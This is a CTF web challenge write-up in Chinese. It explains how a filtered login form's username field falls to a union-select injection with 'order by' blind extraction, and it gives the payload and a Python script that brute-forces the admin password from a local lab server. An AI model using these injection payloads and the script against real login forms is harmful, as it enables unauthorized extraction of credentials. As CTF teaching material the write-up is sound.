### 1.题目名称

Emmm, how to bypass?



### 2.题目类型

web(middle)



### 3.题目描述

emmm 该怎么拿到密码呢 

flag在数据库中，且其中字母均为小写字母



### 4.考察知识点

考察基本的union联合注入、filter绕过和排序盲注技巧



### 5.解题思路

经测试，username字段可以进行注入

但由于过滤规则，username和password where limit 括号等字段字符均被过滤

可以利用order by的排序输出进行判断盲注

可以构造形如

```
admin' union select 1,1,0xaa order by 3 desc#
```

的payload进行盲注

如果admin的密码的第一个字符大于0xaa，查询结果便为用户名admin

否则即为1

由此可通过爆破0xaa处值并不断拼接进行盲注得到flag，全变为小写后即为flag值：

```
import requests

url = "http://127.0.0.1/index.php"
strs = "0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~"
payload = "admin' union select 1,2,0x{value} order by 3 desc#"
flag = ""
for xx in xrange(40):
    for i in strs:
        data = {"username":payload.format(value=(flag+i).encode('hex')),"password":'xxxxxx'}
        ret = requests.post(url,data).content
        if "admin" not in ret:
            flag += chr(ord(i)-1)
            print flag.lower()
            break
```

